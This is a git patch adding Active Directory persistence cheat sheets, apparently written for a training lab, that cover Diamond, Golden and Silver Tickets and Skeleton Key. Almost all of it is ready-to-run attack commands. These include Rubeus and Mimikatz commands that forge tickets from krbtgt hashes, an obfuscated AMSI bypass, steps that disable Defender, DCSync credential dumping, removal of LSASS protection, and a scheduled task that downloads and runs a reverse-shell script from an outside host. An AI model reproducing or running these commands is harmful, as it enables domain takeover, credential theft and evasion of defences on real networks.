From 66072deda13877159f443ee46d71cf04fb07079e Mon Sep 17 00:00:00 2001
From: RFS <marketing.poplab@gmail.com>
Date: Wed, 3 Apr 2024 23:41:03 +0000
Subject: [PATCH] RFS-13: No subject

---
 SUMMARY.md                                    |  4 ++
 .../diamond-ticket.md                         | 15 +++++
 .../golden-ticket.md                          | 65 +++++++++++++++++++
 .../silver-ticket.md                          | 28 ++++++++
 .../skeleton-key.md                           | 31 +++++++++
 5 files changed, 143 insertions(+)
 create mode 100644 domain-dominance-and-persistence/diamond-ticket.md
 create mode 100644 domain-dominance-and-persistence/golden-ticket.md
 create mode 100644 domain-dominance-and-persistence/silver-ticket.md
 create mode 100644 domain-dominance-and-persistence/skeleton-key.md

diff --git a/SUMMARY.md b/SUMMARY.md
index 4fbf77c..0483358 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -33,6 +33,10 @@
 ## Domain Dominance & Persistence
 
 * [Description](domain-dominance-and-persistence/description.md)
+* [Silver Ticket](domain-dominance-and-persistence/silver-ticket.md)
+* [Golden Ticket](domain-dominance-and-persistence/golden-ticket.md)
+* [Skeleton Key](domain-dominance-and-persistence/skeleton-key.md)
+* [Diamond Ticket](domain-dominance-and-persistence/diamond-ticket.md)
 
 ## Cross Domain Attacks
 
diff --git a/domain-dominance-and-persistence/diamond-ticket.md b/domain-dominance-and-persistence/diamond-ticket.md
new file mode 100644
index 0000000..8de80b5
--- /dev/null
+++ b/domain-dominance-and-persistence/diamond-ticket.md
@@ -0,0 +1,15 @@
+# Diamond Ticket
+
+### Rubeus.exe
+
+#### We would still need krbtgt AES keys. Use the following Rubeus command to create a diamond ticket (note that RC4 or AES keys of the user can be used too)
+
+```
+Rubeus.exe diamond /krbkey:5e3d2096abb01469a3b0350962b0c65cedbbc611c5eac6f3ef6fc1ffa58cacd5 /user:studentuserx /password:studentuserxpassword /enctype:aes /ticketuser:administrator /domain:us.techcorp.local /dc:US-DC.us.techcorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
+```
+
+#### We could also use /tgtdeleg option in place of credentials in case we have access as a domain user
+
+```
+Rubeus.exe diamond /krbkey:5e3d2096abb01469a3b0350962b0c65cedbbc611c5eac6f3ef6fc1ffa58cacd5 /tgtdeleg /enctype:aes /ticketuser:administrator /domain:us.techcorp.local /dc:US-DC.us.techcorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
+```
diff --git a/domain-dominance-and-persistence/golden-ticket.md b/domain-dominance-and-persistence/golden-ticket.md
new file mode 100644
index 0000000..5046524
--- /dev/null
+++ b/domain-dominance-and-persistence/golden-ticket.md
@@ -0,0 +1,65 @@
+# Golden Ticket
+
+## Invoke-Mimikatz
+
+### Disable Defender \[ Important ]
+
+```
+Set-MpPreference -DisableRealtimeMonitoring $true
+Set-MpPreference -DisableIOAVProtection $true
+```
+
+### AMSI bypass \[ Important ]
+
+```
+sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{O}"-F'F', 'rE' ) ) 3; ( GeT-VariaBle ( "1Q2U" + "zX" )  -VaL_s+)."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{@}{5}" -f'Util', 'A', 'Amsi','.Management.', 'utomation.','s', 'System' ))."g`etf`iE1D"( ( "{O}{2}{1}" -f'amsi','d','InitFaile' ),("{2}{4}{O}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"(${n`ULl},${t`RuE} )
+
+S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
+```
+
+### Execute mimikatz on DC as DA to get krbtgt hash
+
+```
+Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc
+```
+
+### Create a ticket on any machine \[ "pass the ticket" attack]
+
+```
+Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-268341927-4156871508-1792461683 /krbtgt:a9b30e5bO0dc865eadcea941le4ade72d /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
+```
+
+### List Kerberos services available
+
+```
+klist
+```
+
+### To use the DCSync feature for getting krbtg hash execute the below command with DA privileges
+
+```
+Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
+```
+
+```
+Using the DCSync option needs no code execution (no need to run Invoke-Mimikatz) on the target DC
+```
+
+***
+
+## Binaries
+
+### Using SafetyKatz
+
+```
+C:\Users\Public\SafetyKatz.exe "lsadump::lsa /patch" "exit" 
+or
+C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:us\krbtgt" "exit"
+```
+
+### On a machine which can reach the DC over network (Need elevation):
+
+```
+C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:us.techcorp.local /sid:S-1-5-21-210670787-2521448726-163245708 /krbtgt:b0975ae49f441adc6b024ad238935af5 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
+```
+
diff --git a/domain-dominance-and-persistence/silver-ticket.md b/domain-dominance-and-persistence/silver-ticket.md
new file mode 100644
index 0000000..bacd127
--- /dev/null
+++ b/domain-dominance-and-persistence/silver-ticket.md
@@ -0,0 +1,28 @@
+# Silver Ticket
+
+### Invoke-Mimikatz
+
+#### Execute mimikatz on DC as DA to get krbtgt hash
+
+```
+Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc
+```
+
+#### Using hash of the Domain Controller computer account, below command provides access to shares on the DC
+
+```
+Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-268341927-4156871508-1792461683 /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS /rc4:6f5b5acaf7433b3282ac22e21e62FF22 /user:Administrator /ptt"'
+```
+
+```
+Similar command can be used for any other service on a machine.
+Which services? HOST, RPCSS, WSMAN and many more.
+```
+
+### Schedule and execute a task
+
+```
+schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://192.168.100.1:8080/Invoke-PowerShellTcp.psi''')'"
+
+schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "STCheck"
+```
diff --git a/domain-dominance-and-persistence/skeleton-key.md b/domain-dominance-and-persistence/skeleton-key.md
new file mode 100644
index 0000000..40834ce
--- /dev/null
+++ b/domain-dominance-and-persistence/skeleton-key.md
@@ -0,0 +1,31 @@
+# Skeleton Key
+
+### Invoke-Mimikatz
+
+#### Use the below command to inject a skeleton-Key
+
+```
+Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton' -ComputerName dcorp-dc.dollarcorp.moneycorp.local
+```
+
+```
+Skeleton Key password is : **mimikatz**
+```
+
+#### Now we can access any machine with valid username and password as mimikatz
+
+```
+Enter-PSSession -Computername dcorp-dc.dollarcorp.moneycorp.local -credential dcorp\Administrator
+```
+
+#### LSASS running as a protected process
+
+In case Lsass is running as a protected process, we can still use Skeleton Key but it needs the mimikatz driver (mimidriv.sys) on disk of the target DC
+
+```
+mimikatz # privilege::debug
+mimikatz # !+
+mimikatz # !processprotect /process:lsass.exe /remove
+mimikatz # misc::skeleton
+mimikatz # !-
+```